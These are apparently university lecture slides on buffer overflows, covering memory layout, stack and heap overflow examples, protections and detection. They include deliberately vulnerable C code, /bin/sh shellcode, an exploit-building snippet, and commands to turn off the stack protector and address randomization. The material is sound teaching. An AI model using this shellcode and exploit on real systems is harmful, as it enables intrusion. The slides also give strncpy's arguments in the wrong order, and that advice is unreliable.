lecture: buffer overflow - iowa state universityhome.eng.iastate.edu/~othmanel/files/cpre562/lecture...
TRANSCRIPT
Lecture: Buffer Overflow
Lotfi ben Othmane
• What is a buffer overflow?• How to exploit a buffer overflow?• What are the mitigation techniques?• How to detect a buffer overflow?
2
Plan
3
Memory Layout
Stack
HeapBSS SegmentData SegmentText SegmentLow address
High address
#include<string.h>#include<stdio.h>#include <stdlib.h>
int x = 100;int main(){
// data stored on stack
int a=2;float b=2.5;
static int y;// allocate memory on heap
int*ptr = (int*) malloc(2*sizeof(int));// values 5 and 6 stored on heap
ptr[0]=5;ptr[1]=6;// deallocate memory on heapfree(ptr);return 1;
} 4
Memory Layout
Example1.c
ü x is at 0x804a01c content 100
ü a is at 0xbff21cd4 content 2ü b is at 0xbff21cd8 content 2.500000
ü y is at 0x804a028 content 0
ü ptr is at 0xbff21cdc, content 0x8f64008
ü ptr is at 0x8f64008, content 5ü ptr is at 0x8f6400c, content 6
5
Memory Layout
Data segment
Stack
BSS segment
Heap
#include<string.h>#include<stdio.h>#include <stdlib.h>
int x = 100;int main(){
// data stored on stack
int a=2;float b=2.5;
static int y;// allocate memory on heap
int*ptr = (int*) malloc(2*sizeof(int));
// values 5 and 6 stored on heap
ptr[0]=5;ptr[1]=6;// deallocate memory on heapfree(ptr);return 1;
}
Stack
int main(){
char buffer2[50];char buffer[12];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;
}
6
Simple Buffer Overflow
What is the content of buffer?
What is the content of buffer 2?
Example2.c
Buffer overflow - More data is copied to the destination buffer than the size of the allocated space .
7
Buffer Overflow
8
Simple Buffer Overflow
int main(){
char buffer2[50];char buffer[12];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;
}
9
Simple Buffer Overflow
Example2.c
*** stack smashing detected ***
Stackguard: mechanism to detect changes to specific data stored in the stack
Disable: gcc [filename.c] –fno-stack-protector
10
Protection Mechanism 1 - Stackguard
11
Protection Mechanism - Stackguard
Return Address
Buffer[11]
Guard
….Buffer[0]
Set the guardmovl %gs:20, %eaxmovl %eax, -12(%ebp)xorl %eax, %eax
Check the guardmovl -12(%ebp), %eaxxorl %gs:20, %eaxJe .L2Call _stack_chk_fail
Code inserted by compiler
int main(){
char buffer[12];char buffer2[50];char *str ="This is definitely longer than 12";strcpy(buffer, str);return 1;
}
12
Simple Buffer Overflow
What is the content of buffer?
What is the content of buffer 2?
Let’s change the order of buffer and buffer 2. Can we still have the overflow?
int main(){
char *input = (char *)malloc(1);char *secret= (char *)malloc(1);strcpy(secret, "Password");printf("Enter password");scanf("%s", input);if(strcnmp(input,secret,10)==0)
{ printf("Access granted");}else
{printf("Access Denied");}
13
Heap-based Buffer Overflow
Example3.c
Can we get access without entering the correct password?
char buff[10]; int pass = 0;char secret[10];strcpy(buff,"Password");printf("\n Enter your password: ");gets(secret);if(strcmp(secret, buff))
{ printf ("\n Wrong Password \n");}else
{printf ("\n Correct Password \n");pass = 1; }
if(pass)printf ("\n Root privileges given to the user \n");
14
So What?
Example4.c
Can we get access without entering the correct password?
How can we better use the weakness?
15
Uses of Buffer Overflow
int bof(char *str){
char buffer[24];
strcpy(buffer, str);
return 1;}
16
Stack Memory Layout
•int main(int argc, char **argv){
char str[517];FILE *badfile;
badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);
printf("Returned Properly\n");return 1;
}
stack.c
int bof(char *str){
char buffer[24];
strcpy(buffer, str);
return 1;}
17
Stack Memory Layout
value of *str
Return Address
Previous Frame pointer
Value of buffer
Current framepointer
Arguments
Local variables
High address
Low address
18
Stack Buffer Overflow
int bof(char *str){
char buffer[24];
strcpy(buffer, str);
return 1;}
•int main(int argc, char **argv){
char str[517];FILE *badfile;
badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);
printf("Returned Properly\n");return 1;
}
Example5.c
Can we have code in “badfile”?
#include stdio.hvoid main() {
char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);
}
19
Exploit - Shell Code
“\x31\xc0" /* xorl %eax,%eax */"\x50" /* pushl %eax */"\x68""//sh" /* pushl $0x68732f2f */"\x68""/bin" /* pushl $0x6e69622f */"\x89\xe3" /* movl %esp,%ebx */"\x50" /* pushl %eax */"\x53" /* pushl %ebx */"\x89\xe1" /* movl %esp,%ecx */"\x99" /* cdql */"\xb0\x0b" /* movb $0x0b,%al */"\xcd\x80" /* int $0x80 */
20
Shell Exploit
int bof(char *str){
char buffer[24];
strcpy(buffer, str);
return 1;}
21
Stack Memory Layout for Functions
Exploit
Return Address
Previous Frame pointer
Value of bufferCurrent framepointer
Arguments
Local variables
High address
Low address
Can we change the return address?
2222
Exploit
Return Address
Previous Frame pointer
Value of bufferCurrent framepointer
Arguments
Local variables
High address
Low address
Stack Memory Layout for Functions
23
Stack Overflow
void* readaddress(){asm("movl %ebp, %eax");
}
int bof(char *str){
char buffer[24];
printf("\n Address of buffer %p", &buffer);printf("\n Ebp %p", readaddress());return 1;
}
Example5.c
addr = 0xbffff148 + offset;
ptr = buffer;addr_ptr = (long*)(ptr);
for (i = 0; i < 10; i++)*(addr_ptr++) = addr;
memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode));
24
Final Exploit
Exploit_final.c
25
Stack Overflow
int bof(char *str){
char buffer[24];
strcpy(buffer, str);
return 1;}
•int main(int argc, char **argv){
char str[517];FILE *badfile;
badfile = fopen("badfile", "r");fread(str, sizeof(char), 517, badfile);bof(str);
printf("Returned Properly\n");return 1;
}
stack.c
Are we ready?
Perform the attack
We observe that the program does not display: Returned Properly
26
void host_lookup(char *user_supplied_addr){struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);
validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name);}
27
Buffer Overflow in Real Word
Buffer overflow have played a major roles in attacks such as:• Moris worm of 1988• Code Red worm of 2001• Etc.
28
So
• Randomize the memory space of the key data area• Text segment• Stack• Heap• Data segment
• Disable randomization: sudo sysctl –w kernel.randomize_va_space=0Value 2 for randomization
29
Protection 2 - Address Randomization
ü x is at 0x804a01c content 100
ü a is at 0xbff21cd4 content 2ü b is at 0xbff21cd8 content 2.500000
ü y is at 0x804a028 content 0
ü ptr is at 0xbff21cdc, content 0x8f64008ü ptr is at 0x8f64008, content 5ü ptr is at 0x8f6400c, content 6
30
Protection 2 - Address Randomization
Data segment
Stack
BSS segment
Heap
The number of possibilities is limited and could be guessed in few minutes
• There are safe implementations for memory management functions
• E.g., use strncpy(source, destination, size)
31
Protection 3 – Defensive Functions
32
Protection 4 – Detect Vulnerabilities Using Code Analysis
From Truecryt report, page 32
Code analysis: Ensure that boundaries are checked before copying
Arm race – attackers bypass protection mechanisms
33
Buffer Overflow Detection
Arada Locomate – V2V Device
34
Arada Locomate – V2V DeviceBuffer overflow hypothesis at read()
35
Thank you
Any Question?
36